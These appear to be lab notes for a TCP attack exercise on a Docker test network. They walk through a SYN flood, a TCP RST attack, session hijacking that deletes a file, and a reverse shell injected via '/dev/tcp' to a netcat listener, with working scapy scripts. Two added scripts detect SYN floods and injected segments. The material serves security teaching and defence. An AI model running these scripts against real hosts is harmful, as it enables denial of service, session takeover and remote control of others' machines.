1. Docker usage
Change the Docker registry mirror:
vim /etc/docker/daemon.json
{
  "registry-mirrors": ["https://docker.1panel.live"]
}
Build the containers:
docker-compose build
Start the containers:
docker-compose up
Ctrl+Shift+T opens a new terminal.
Check the container status:
dockps
Get a shell in one of the containers, for example:
docker exec -it victim-10.9.0.5 bash
2. Experiments
Task 1. SYN flooding attack
On victim, check the SYN backlog size and the current connections:
sysctl net.ipv4.tcp_max_syn_backlog
netstat -tna
Turn off SYN cookies:
sysctl -w net.ipv4.tcp_syncookies=0
On seed (the attacker machine), compile synflood.c:
gcc synflood.c -o synflood
Switch to the attacker machine:
docker exec -it victim-10.9.0.5 bash
The volumes directory in the attacker container is shared with the seed machine.
Attack victim from the attacker machine:
synflood 10.9.0.5 23
Check the network state on victim: a large number of unknown IPs appear.
After waiting a short while,
try to telnet to victim from the user1 machine:
docker exec -it user1-10.9.0.6 bash
telnet 10.9.0.5
The connection fails.
Analyze the packets with Wireshark:
Enable SYN cookies and launch the attack again:
sysctl -w net.ipv4.tcp_syncookies=1
Although SYN packets are still arriving continuously, user1 can now telnet to victim.
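As an added example (not part of the original lab notes and not code from the SEED project), the following Python script reads the output of the two sysctl lines and of netstat -tna used above on victim and reports whether the number of half-open (SYN_RECV) connections points to a SYN flood and whether SYN cookies are enabled. The sysctl and netstat text embedded in it is constructed sample output, not captured from the lab; the threshold of half the backlog is an assumed heuristic.

```python
#!/usr/bin/env python3
"""Added example, not from the lab notes: check a host for SYN-flood symptoms
from the output of `sysctl` and `netstat -tna` (constructed samples below)."""
import re
from collections import Counter

# Constructed sample of `sysctl net.ipv4.tcp_syncookies` and
# `sysctl net.ipv4.tcp_max_syn_backlog` on an unhardened host.
SYSCTL_WEAK = """net.ipv4.tcp_syncookies = 0
net.ipv4.tcp_max_syn_backlog = 128
"""
SYSCTL_HARDENED = SYSCTL_WEAK.replace("tcp_syncookies = 0", "tcp_syncookies = 1")

NETSTAT_HEADER = (
    "Active Internet connections (servers and established)\n"
    "Proto Recv-Q Send-Q Local Address           Foreign Address         State\n"
    "tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN\n"
    "tcp        0      0 10.9.0.5:23             10.9.0.6:51122          ESTABLISHED\n"
)
# Constructed: a quiet host, and the same host with 97 half-open connections
# from 97 different (spoofed) source addresses in a documentation range.
NETSTAT_QUIET = NETSTAT_HEADER
NETSTAT_FLOODED = NETSTAT_HEADER + "".join(
    f"tcp        0      0 10.9.0.5:23             203.0.113.{i}:{40000 + i}  SYN_RECV\n"
    for i in range(1, 98)
)

def parse_sysctl(text):
    """Map 'key = value' lines to {key: int(value)}."""
    values = {}
    for line in text.splitlines():
        m = re.match(r"\s*(\S+)\s*=\s*(\d+)\s*$", line)
        if m:
            values[m.group(1)] = int(m.group(2))
    return values

def half_open(text):
    """Return (count per local socket, set of foreign IPs) for SYN_RECV rows."""
    per_local = Counter()
    sources = set()
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 6 and f[0].startswith("tcp") and f[5] == "SYN_RECV":
            per_local[f[3]] += 1
            sources.add(f[4].rsplit(":", 1)[0])
    return per_local, sources

def assess_syn_flood(sysctl_text, netstat_text, ratio=0.5):
    """Flag a SYN flood when half-open connections reach `ratio` of the backlog
    (assumed heuristic) and report whether SYN cookies are already enabled."""
    cfg = parse_sysctl(sysctl_text)
    backlog = cfg.get("net.ipv4.tcp_max_syn_backlog", 0)
    cookies = cfg.get("net.ipv4.tcp_syncookies", 0) == 1
    per_local, sources = half_open(netstat_text)
    total = sum(per_local.values())
    busiest = per_local.most_common(1)[0][0] if per_local else None
    suspected = backlog > 0 and total >= ratio * backlog
    return {
        "backlog": backlog,
        "syncookies_enabled": cookies,
        "half_open_total": total,
        "distinct_sources": len(sources),
        "busiest_local": busiest,
        "suspected": suspected,
        # The mitigation used in the lab itself; only reported when it applies.
        "recommendation": None if cookies or not suspected
                          else "sysctl -w net.ipv4.tcp_syncookies=1",
    }

if __name__ == "__main__":
    for name, netstat in (("quiet", NETSTAT_QUIET), ("flooded", NETSTAT_FLOODED)):
        print(name, assess_syn_flood(SYSCTL_WEAK, netstat))
```

The "many distinct sources, all half-open on one local port" pattern is what distinguishes a flood from a busy but healthy listener, which is why the script reports distinct_sources alongside the raw count.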
Task 2. TCP RST attack on telnet
Use seed-attacker as the attacker machine, user1 as the client, and victim as the server.
The client telnets to the server:
docker exec -it user1-10.9.0.6 bash
telnet 10.9.0.5
On the host, write RSTattack.py (automated attack) and share it into the attacker container through volumes:
#!/usr/bin/env python3
from scapy.all import *

def spoof_pkt(pkt):
    # Reply in the server's name: reuse the addresses of the sniffed server packet
    ip = IP(src=pkt[IP].src, dst=pkt[IP].dst)
    # RST carrying the sequence number that follows the sniffed segment
    tcp = TCP(sport=23, dport=pkt[TCP].dport, flags="R", seq=pkt[TCP].seq+1)
    pkt = ip/tcp
    ls(pkt)
    send(pkt, verbose=0)

f = 'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-88413f1d34bf', filter=f, prn=spoof_pkt)
The attacker container has no python, but it does have apt.
However, apt has no sources configured, and the container has no text editor such as vi or vim.
Use the old-fashioned method:
echo "deb http://mirrors.163.com/ubuntu/ precise main restricted" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise main restricted" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-updates main restricted" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-updates main restricted" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise universe" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise universe" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-updates universe" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-updates universe" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise multiverse" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise multiverse" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-updates multiverse" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-updates multiverse" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-backports main restricted universe multiverse" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-backports main restricted universe multiverse" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-security main restricted" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-security main restricted" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-security universe" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-security universe" >>/etc/apt/sources.list
echo "deb http://mirrors.163.com/ubuntu/ precise-security multiverse" >>/etc/apt/sources.list
echo "deb-src http://mirrors.163.com/ubuntu/ precise-security multiverse" >>/etc/apt/sources.list
echo "deb http://extras.ubuntu.com/ubuntu precise main" >>/etc/apt/sources.list
echo "deb-src http://extras.ubuntu.com/ubuntu precise main" >>/etc/apt/sources.list
You do not need all of them; in practice a few are enough.
Update the apt-get sources:
apt-get update
apt-get install python3-pip
Run RSTattack.py in the attacker container:
python3 RSTattack.py
While the telnet session is open, typing any character (i.e. sending any data packet) lets the attacker forge a segment with altered flag bits (RST), which tears down the connection.
Task 3. TCP session hijacking attack
Use victim as the server, user1 as the client, and seed-attacker as the attacker machine.
Create new.txt on victim:
touch new.txt
echo "helloworld!" >>new.txt
On the client, telnet to the server and view the file "new.txt" just created.
On the attacker machine, launch the session hijacking attack with Python code that deletes "new.txt" on the server:
#!/usr/bin/env python3
from scapy.all import *

def spoof_pkt(pkt):
    # Speak as the client: swap the addresses of the sniffed server packet
    ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    # Continue the client's stream at the point the server expects
    tcp = TCP(sport=pkt[TCP].dport, dport=23,
              flags="A",
              seq=pkt[TCP].ack, ack=pkt[TCP].seq+1)
    data = "rm -rf new.txt"
    pkt = ip/tcp/data
    ls(pkt)
    send(pkt, verbose=0)

f = 'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-51a3ed64a0eb', filter=f, prn=spoof_pkt)
On the client, go back to the telnet session opened earlier, observe what happens, and explain why.
On the server the file was deleted successfully, and the client's cursor is frozen: no commands can be entered. The reason is that the client's terminal has lost the correct ack and seq numbers, so it can neither send nor receive data, nor exit.
Task 4. Creating a reverse shell through TCP session hijacking
Write the Python program:
#!/usr/bin/env python3
from scapy.all import *

def spoof_pkt(pkt):
    # Same injection as Task 3, with a different command as payload
    ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    tcp = TCP(sport=pkt[TCP].dport, dport=23, flags="A", seq=pkt[TCP].ack, ack=pkt[TCP].seq+1)
    data = "/bin/bash -i > /dev/tcp/10.9.0.1/1234 0<&1 2>&1\n\0"
    pkt = ip/tcp/data
    send(pkt, verbose=0)

f = 'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-51a3ed64a0eb', filter=f, prn=spoof_pkt)
Start a listener on attacker:
nc -lnv 1234
Telnet from user1 to victim.
Open another bash on attacker and run hijackingreverse.py.
Type a space in the telnet session on user1.
The listener receives the connection and we get a shell.
Commands can now be executed remotely on victim from the attacker machine.
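As an added example (not part of the original lab notes and not SEED project code), the following Python script shows how the injections of Tasks 2, 3 and 4 look to a monitor on the bridge: the forged RST and the forged data segment each reuse a sequence number that the genuine endpoint also uses, but with different flags or payload, whereas a genuine retransmission repeats identical bytes. The segment list is constructed by hand to mirror the lab's telnet session, not a real capture, and the tuple layout is an assumption of this example.

```python
#!/usr/bin/env python3
"""Added example, not from the lab notes: offline detector for injected TCP
segments of the kind used in Tasks 2-4. Segments that carry data or SYN/FIN/RST
occupy sequence space; two such segments of one flow with the same seq but a
different (flags, payload) pair are a sign that two senders share the stream."""
from collections import defaultdict

# Constructed segments: (src_ip, sport, dst_ip, dport, flags, seq, payload)
# for one telnet session between user1 (10.9.0.6) and victim (10.9.0.5).
CAPTURE = [
    ("10.9.0.6", 51122, "10.9.0.5", 23, "PA", 1000, b"l"),      # client types 'l'
    ("10.9.0.5", 23, "10.9.0.6", 51122, "PA", 5000, b"l"),      # server echoes it
    ("10.9.0.6", 51122, "10.9.0.5", 23, "A", 1001, b""),        # pure ACK, uses no seq
    ("10.9.0.6", 51122, "10.9.0.5", 23, "PA", 1001, b"rm -rf new.txt"),  # forged (Task 3)
    ("10.9.0.6", 51122, "10.9.0.5", 23, "PA", 1001, b"s"),      # real client keystroke
    ("10.9.0.5", 23, "10.9.0.6", 51122, "R", 5001, b""),        # forged RST (Task 2)
    ("10.9.0.5", 23, "10.9.0.6", 51122, "PA", 5001, b"s"),      # real server echo
    ("10.9.0.5", 23, "10.9.0.6", 51122, "PA", 5001, b"s"),      # retransmission, benign
]

def consumes_seq(flags, payload):
    """Only segments carrying data or SYN/FIN/RST occupy sequence space;
    pure ACKs never conflict with anything."""
    return bool(payload) or any(c in flags for c in "SFR")

def find_injections(capture):
    """Return one alert per (flow, seq) that is seen with a second, different
    flags/payload variant. Which variant is the forgery cannot be decided from
    the stream alone; in the lab the forged segment arrives first."""
    variants = defaultdict(set)   # (flow, seq) -> {(flags, payload), ...}
    alerts = []
    for idx, (src, sport, dst, dport, flags, seq, payload) in enumerate(capture):
        if not consumes_seq(flags, payload):
            continue
        key = ((src, sport, dst, dport), seq)
        variant = (flags, payload)
        if variants[key] and variant not in variants[key]:
            alerts.append({
                "index": idx,
                "flow": key[0],
                "seq": seq,
                "earlier": sorted(variants[key]),
                "later": variant,
            })
        variants[key].add(variant)
    return alerts

if __name__ == "__main__":
    for a in find_injections(CAPTURE):
        print(f"segment {a['index']}: {a['flow']} seq={a['seq']} "
              f"conflicts with {a['earlier']} -> {a['later']}")
```

The same overlap rule is what stream reassembly in an IDS relies on; it only works from a vantage point that sees both the forged and the genuine segment, which on this lab network is the Docker bridge. The structural fix the lab points at is independent of detection: telnet carries its sequence numbers and its data in the clear, and an encrypted, authenticated protocol such as SSH leaves an injected segment unable to produce a valid command.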